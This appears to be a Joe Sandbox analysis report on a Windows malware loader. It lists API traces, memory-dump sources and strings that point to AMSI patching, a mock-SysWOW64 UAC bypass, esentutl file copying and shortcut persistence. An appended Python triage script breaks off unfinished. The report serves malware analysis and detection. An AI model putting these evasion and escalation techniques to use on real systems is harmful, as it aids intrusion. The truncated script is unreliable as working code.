                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 48d9ea993ac580c9ae731fbfc45c7e238690d6c5d0c23916e80493ebac788498
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: d7ae60496f748428e9f463f6770e8e2df4bbb3cea8051df42b51b3733dab53aa
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48d9ea993ac580c9ae731fbfc45c7e238690d6c5d0c23916e80493ebac788498
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F016234A40304AFFB54EFA4EC81F5EB7AEEB49700F514860BA04D7790D634BD04EA64
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RtlI.N(?,?,00000000,02D0DC7E), ref: 02D0DC2C
                                                                                                                                                                                                                                                                                                                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D0DC7E), ref: 02D0DC42
                                                                                                                                                                                                                                                                                                                                                      • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D0DC7E), ref: 02D0DC61
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Path$DeleteFileNameName_
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4284456518-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a806a6130e5ad80ab4e070839caa3ad190fc82a77973422b81e39e31c2335883
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 13a9cbd65658c4eb5edcf08f40111d9fb514640375cbed8b43c1af04b139600d
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a806a6130e5ad80ab4e070839caa3ad190fc82a77973422b81e39e31c2335883
• Instruction Fuzzy Hash: 4A0162759446086EEB05DBE0DDC1FCD77BAEB48704F5144939240E62E1DAB4AF048B34
APIs
  • Part of subcall function 02CF4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02CF4F2E
• RtlI.N(?,?,00000000,02D0DC7E), ref: 02D0DC2C
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D0DC7E), ref: 02D0DC42
• NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D0DC7E), ref: 02D0DC61
  • Part of subcall function 02CF4C60: SysFreeString.OLEAUT32(02D0F4A4), ref: 02CF4C6E
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: PathString$AllocDeleteFileFreeNameName_
• String ID:
• API String ID: 1530111750-0
• Opcode ID: ff0b90ecb0fc565d10fb29cb3a9614c3110216f20ac88e63519f22ef5add8950
• Instruction ID: 324893896cacb73f19fa5ca556d31ade7b5bb2dd25967548d037b9541d7d6cd8
• Opcode Fuzzy Hash: ff0b90ecb0fc565d10fb29cb3a9614c3110216f20ac88e63519f22ef5add8950
• Instruction Fuzzy Hash: 5101E17194020CBADB51EBE0DD92FCEB7BEEB48700F5144A2A605E26D0EA756F049A64
APIs
  • Part of subcall function 02D06D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02D06DB9,?,?,?,00000000), ref: 02D06D99
• CoCreateInstance.OLE32(?,00000000,00000005,02D06EAC,00000000,00000000,02D06E2B,?,00000000,02D06E9B), ref: 02D06E17
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: CreateFromInstanceProg
• String ID:
• API String ID: 2151042543-0
• Opcode ID: 01f1f3e319c07b55344d527fca591b706a0d04703541599aea1d948589f1efb8
• Instruction ID: f35d284527ef38c67f9d3e2379e94b705aa59b9dffcc4ce70a58811278bd98d4
• Opcode Fuzzy Hash: 01f1f3e319c07b55344d527fca591b706a0d04703541599aea1d948589f1efb8
• Instruction Fuzzy Hash: 7801D4712087046EE715EF61EC92A6F7BADD749B00F514835F605E27A0E670DD2088B0

Control-flow Graph

APIs
  • Part of subcall function 02D089D0: FreeLibrary.KERNEL32(75470000,00000000,00000000,00000000,00000000,02D7738C,Function_0000662C,00000004,02D7739C,02D7738C,05F5E103,00000040,02D773A0,75470000,00000000,00000000), ref: 02D08AAA
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02E6B7E0,02E6B824,OpenSession,02D77380,02D1B7B8,UacScan,02D77380), ref: 02D186E9
• ResumeThread.KERNEL32(00000000,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8), ref: 02D18D33
• CloseHandle.KERNEL32(00000000,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,00000000,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380), ref: 02D18EB2
  • Part of subcall function 02D0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize,02D773A8,02D0A93C,UacScan), ref: 02D08960
  • Part of subcall function 02D0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D0897A
  • Part of subcall function 02D0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize), ref: 02D089B6
• CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02D77380,02D1B7B8,UacInitialize,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,UacScan,02D77380), ref: 02D192A4
  • Part of subcall function 02CF7E5C: GetFileAttributesA.KERNEL32(00000000,?,02D1041F,ScanString,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,UacInitialize), ref: 02CF7E67
  • Part of subcall function 02D0DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D0DD5E), ref: 02D0DCCB
  • Part of subcall function 02D0DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D0DD05
  • Part of subcall function 02D0DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D0DD32
  • Part of subcall function 02D0DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D0DD3B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02D083C2), ref: 02D083A4
                                                                                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000,OpenSession,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,Initialize,02D77380,02D1B7B8,00000000,00000000,00000000,ScanString,02D77380,02D1B7B8), ref: 02D1B2FA
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                                                                                                                                                                                                                                                      • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2769005614-3738268246
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c90a304208f14c2305c29975a251f1ace3193b15e37360fc4fe88490eb8fc57e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c042760bd45aca4c375639e1e98d5544db5076f9b5d59f5d4fa9ae881a6146a5
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c90a304208f14c2305c29975a251f1ace3193b15e37360fc4fe88490eb8fc57e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F343FA35A0425D9BCBA4EB64EC809CF73BAEF84304F5040E6E609EB754DA30AE95DF51
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D089D0: FreeLibrary.KERNEL32(75470000,00000000,00000000,00000000,00000000,02D7738C,Function_0000662C,00000004,02D7739C,02D7738C,05F5E103,00000040,02D773A0,75470000,00000000,00000000), ref: 02D08AAA
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D0DD5E), ref: 02D0DCCB
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D0DD05
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D0DD32
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D0DD3B
                                                                                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,ScanBuffer,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,02D1BB30,00000000,00000000,02D1BB24,00000000,00000000), ref: 02D140CB
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D088B8: LoadLibraryW.KERNEL32(amsi), ref: 02D088C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D088B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02D08920
                                                                                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,000003E8,ScanBuffer,02D77380,02D1B7B8,UacScan,02D77380), ref: 02D14277
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize,02D773A8,02D0A93C,UacScan), ref: 02D08960
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D0897A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize), ref: 02D089B6
                                                                                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00004E20,UacScan,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,UacInitialize,02D77380,02D1B7B8), ref: 02D150EE
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC04: RtlI.N(?,?,00000000,02D0DC7E), ref: 02D0DC2C
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D0DC7E), ref: 02D0DC42
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D0DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D0DC7E), ref: 02D0DC61
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF7E5C: GetFileAttributesA.KERNEL32(00000000,?,02D1041F,ScanString,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,UacScan,02D77380,02D1B7B8,UacInitialize), ref: 02CF7E67
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D085BC: WinExec.KERNEL32(?,?), ref: 02D08624
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                                                                                                                                                                                                                                                      • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2171786310-3926298568
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: be9fe661855c13e9b96045e85085fe7344006d455af71b8196e5b21324271c12
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 418c79be551457a21546dc781dc164a66e1258b2856975f270a4f85aa12fe2e5
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be9fe661855c13e9b96045e85085fe7344006d455af71b8196e5b21324271c12
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD43EB34B4025D9FDBA4EB64EC80B9F73BAFF85304F1040A69609A7754DA30AE85EF51

Control-flow Graph (interactive graph for the function at 2d0e678; legend: Executed / Not Executed; graph rendering not reproduced in text)
APIs
  • Part of subcall function 02D089D0: FreeLibrary.KERNEL32(75470000,00000000,00000000,00000000,00000000,02D7738C,Function_0000662C,00000004,02D7739C,02D7738C,05F5E103,00000040,02D773A0,75470000,00000000,00000000), ref: 02D08AAA
  • Part of subcall function 02D08788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D08814
  • Part of subcall function 02D0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize,02D773A8,02D0A93C,UacScan), ref: 02D08960
  • Part of subcall function 02D0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D0897A
  • Part of subcall function 02D0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize), ref: 02D089B6
• WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02D77380,02D0EF4C,OpenSession,02D77380,02D0EF4C,UacScan,02D77380,02D0EF4C,ScanBuffer,02D77380,02D0EF4C,OpenSession,02D77380), ref: 02D0ED6E
• CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02D77380,02D0EF4C,OpenSession,02D77380,02D0EF4C,UacScan,02D77380,02D0EF4C,ScanBuffer,02D77380,02D0EF4C,OpenSession), ref: 02D0ED76
• CloseHandle.KERNEL32(00000940,00000000,00000000,000000FF,ScanString,02D77380,02D0EF4C,OpenSession,02D77380,02D0EF4C,UacScan,02D77380,02D0EF4C,ScanBuffer,02D77380,02D0EF4C), ref: 02D0ED7F
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
• String ID: )"C:\Users\Public\Libraries\aymtmquJ.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
• API String ID: 3475578485-3334284989
• Opcode ID: d9f21110843dd825bfe9742d6d5abef0eaa3d13beced0b0ec602650a4762a89e
• Instruction ID: 36a6e62bd1f7546d6a9248da385fac7e23dbffa517d1c4be619a7e465193add2
• Opcode Fuzzy Hash: d9f21110843dd825bfe9742d6d5abef0eaa3d13beced0b0ec602650a4762a89e
• Instruction Fuzzy Hash: 7022FC74A001599BEBA8FB64D8C1F8FB7BAEF85300F1045A1A604EB394DB30AE45DF55

Control-flow Graph
APIs
• Sleep.KERNEL32(00000000,?,02CF1FC1), ref: 02CF17D0
• Sleep.KERNEL32(0000000A,00000000,?,02CF1FC1), ref: 02CF17E6
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 2f3565d200a3e3ae86bbfb4dd3a96500f213dbb91f2170ecf6ae88258ec2435b
• Instruction ID: d3929ed21a7f454cb1b22cd9fd2d8e1cf3acc1bd2af5fe2fdb5afa9f3e5b8a12
• Opcode Fuzzy Hash: 2f3565d200a3e3ae86bbfb4dd3a96500f213dbb91f2170ecf6ae88258ec2435b
• Instruction Fuzzy Hash: 15B14372A00340CFCB96CF69D480311BBF1EB86325F1D86AAD60D8B385E7B49955CBD0

Control-flow Graph

APIs
• LoadLibraryW.KERNEL32(amsi), ref: 02D088C1
  • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
  • Part of subcall function 02D07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D07DEC
• FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02D08920
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
• String ID: DllGetClassObject$W$amsi
• API String ID: 941070894-2671292670
• Opcode ID: 937b2e0ff848366a887b84b256c3abc7175af84c008357bae0143d1be8c088d1
• Instruction ID: 1c9e57c165651e118346fed87a8e73c85b22d3a790da137e6296aa20ac0aa72e
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 937b2e0ff848366a887b84b256c3abc7175af84c008357bae0143d1be8c088d1
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAF0AF5044C381BAE300E2748C89F4FBECD8B62264F008A18F2E89A3E2D679D5059B77

Control-flow Graph (image not extracted; legend: Executed / Not Executed. The graph covers basic blocks 02CF16E8 to 02CF1C6B, with calls to Sleep and VirtualFree and to the subroutines 02CF14C0, 02CF1500, 02CF1560 and 02CF1644.)
APIs
• Sleep.KERNEL32(00000000,?,?,00000000,02CF1FE4), ref: 02CF1B17
• Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02CF1FE4), ref: 02CF1B31
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 341293323af416bfd1dff1fa07e6489800cc606d7f8abe7adad4450f2767ad32
• Instruction ID: 4b723125d2b0b115dc16041bddefd02a221042c4a61b4fb6f7ba8bbcb42212bd
• Opcode Fuzzy Hash: 341293323af416bfd1dff1fa07e6489800cc606d7f8abe7adad4450f2767ad32
• Instruction Fuzzy Hash: E451AE71641240CFD7D6CF68C984756BBE0AB86328F1C85AED648CB382E7F4C945CBA1
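Every function entry in this section cites a Memory Dump Source whose file name carries the region's base address and what look like Win32 memory attributes (for example 00000020.00001000.00020000 beside 02CF1000, the executable region, and 00000040 beside 02D77000). The Python below is an added example, not part of the Joe Sandbox report or its tooling: it decodes those names and flags committed private regions that hold executable code, which is where manually mapped PEs and injected code live rather than in loader-backed MEM_IMAGE memory. The field layout is an assumption inferred from the names on this page (the report does not document it); the constants are the documented winnt.h values, and the sample names are copied from the entries above.

```python
"""Decode Joe Sandbox .sdmp dump names and triage executable private regions.

Added example; not code from the Joe Sandbox report or tooling.
ASSUMED name layout (inferred from the names on this page, not documented):
  <proc idx>.<dump idx>.<dump id>.<base>.<protect>.<state>.<type>.<reserved>.sdmp
protect/state/type are taken to be MEMORY_BASIC_INFORMATION values from winnt.h.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Documented Win32 constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
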